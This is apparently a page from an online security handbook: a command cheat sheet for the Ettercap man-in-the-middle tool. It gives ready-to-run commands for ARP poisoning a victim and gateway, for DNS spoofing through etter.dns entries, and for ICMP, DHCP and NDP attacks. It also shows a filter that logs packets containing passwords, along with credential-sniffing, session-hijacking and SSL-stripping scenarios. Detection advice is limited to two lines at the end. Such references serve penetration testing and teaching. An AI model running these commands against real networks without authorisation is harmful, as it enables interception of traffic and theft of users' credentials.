Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

ettercap

Ettercap is a comprehensive suite for man-in-the-middle (MITM) attacks on LAN. It features sniffing of live connections, content filtering, and support for active and passive dissection of protocols.

Basic Syntax

ettercap [options] [target1] [target2]

Modes

ModeFlagDescription
Text-TText-only interface
Curses-CCurses-based GUI
GTK-GGTK graphical interface
Daemon-DRun as daemon

Target Specification

MAC/IP/IPv6/PORT

Examples:

  • // - All hosts
  • /192.168.1.1// - Single IP
  • /192.168.1.1-50// - IP range
  • /192.168.1.0/24// - Subnet
  • //80 - All hosts on port 80
  • /192.168.1.1//21,22,23 - Specific ports

Common Options

OptionDescription
-i <iface>Network interface
-TText mode
-GGTK GUI mode
-M <method>MITM attack method
-P <plugin>Activate plugin
-F <file>Load filter from file
-w <file>Write pcap file
-r <file>Read from pcap file
-qQuiet mode (no packet content)
-s <cmd>Execute command at startup
-L <file>Log all traffic to file

ARP Poisoning

# Basic ARP poisoning (MITM between target and gateway)
ettercap -T -q -i eth0 -M arp:remote /192.168.1.100// /192.168.1.1//

# ARP poison entire subnet
ettercap -T -q -i eth0 -M arp:remote /// ///

# ARP poisoning with GUI
ettercap -G -i eth0 -M arp:remote /192.168.1.100// /192.168.1.1//

# One-way ARP poisoning
ettercap -T -q -i eth0 -M arp:oneway /192.168.1.100// /192.168.1.1//

DNS Spoofing

Step 1: Edit /etc/ettercap/etter.dns

# Redirect domain to attacker IP
example.com      A   192.168.1.50
*.example.com    A   192.168.1.50

# Redirect specific subdomain
mail.target.com  A   192.168.1.50

Step 2: Run Ettercap with DNS Plugin

# DNS spoofing with ARP poisoning
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

# GUI mode
ettercap -G -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

MITM Attack Methods

# ARP poisoning
ettercap -T -M arp:remote /target1// /target2//

# ICMP redirect
ettercap -T -M icmp:00:11:22:33:44:55/192.168.1.1

# DHCP spoofing
ettercap -T -M dhcp:192.168.1.100-200/255.255.255.0/192.168.1.1

# Port stealing
ettercap -T -M port /target1// /target2//

# NDP poisoning (IPv6)
ettercap -T -M ndp:remote /target1// /target2//

Sniffing Modes

# Unified sniffing (single interface)
ettercap -T -i eth0

# Bridged sniffing (two interfaces)
ettercap -T -i eth0 -B eth1

# Read from pcap file
ettercap -T -r capture.pcap

# Write to pcap file
ettercap -T -i eth0 -w output.pcap

Plugins

# List available plugins
ettercap -T -P list

# Common plugins
ettercap -T -P dns_spoof -M arp:remote /// ///
ettercap -T -P remote_browser -M arp:remote /// ///
ettercap -T -P find_conn -M arp:remote /// ///
ettercap -T -P finger -M arp:remote /// ///
PluginDescription
dns_spoofDNS spoofing
remote_browserSend visited URLs to browser
find_connFind connections
fingerOS fingerprinting
gw_discoverFind gateway
search_promiscFind promiscuous NICs
sslstripStrip SSL (legacy)
autoaddAuto add new hosts

Filters

Create a Filter (example.filter)

# Drop packets containing specific string
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "password")) {
      log(DATA.data, "/tmp/passwords.log");
   }
}

# Replace content
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Nothing!");
   }
}

# Drop packets
if (ip.src == '192.168.1.100') {
   drop();
   msg("Packet dropped\n");
}

Compile and Use Filter

# Compile filter
etterfilter example.filter -o example.ef

# Use compiled filter
ettercap -T -q -i eth0 -F example.ef -M arp:remote /// ///

Host Discovery

# Scan for hosts
ettercap -T -i eth0

# In interactive mode, press:
# 'h' - hosts list
# 'l' - view host list
# 's' - stop/start sniffing

Logging

# Log to file
ettercap -T -i eth0 -L logfile

# Creates logfile.eci (connection info) and logfile.ecp (packets)

# View logs
etterlog logfile.eci
etterlog -p logfile.ecp

Configuration Files

FilePurpose
/etc/ettercap/etter.confMain configuration
/etc/ettercap/etter.dnsDNS spoofing entries
/etc/ettercap/etter.filterExample filters

Important etter.conf Settings

# Enable IP forwarding (uncomment these)
# Linux
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# Set UID/GID to run as non-root
ec_uid = 65534
ec_gid = 65534

Interactive Commands

KeyAction
hHelp
qQuit
pList plugins
PActivate plugin
lList hosts
sStart/stop sniffing
oShow profiles
cShow connections
SPACEStop scrolling

Common Attack Scenarios

Credential Sniffing

ettercap -T -q -i eth0 -M arp:remote /victim// /gateway//

Session Hijacking

ettercap -T -q -i eth0 -M arp:remote -P remote_browser /victim// /gateway//

SSL Stripping (Legacy)

# Requires sslstrip or similar tool running
ettercap -T -q -i eth0 -M arp:remote /victim// /gateway//

Countermeasures Detection

# Detect other sniffers
ettercap -T -P search_promisc

# Detect ARP spoofing
arpwatch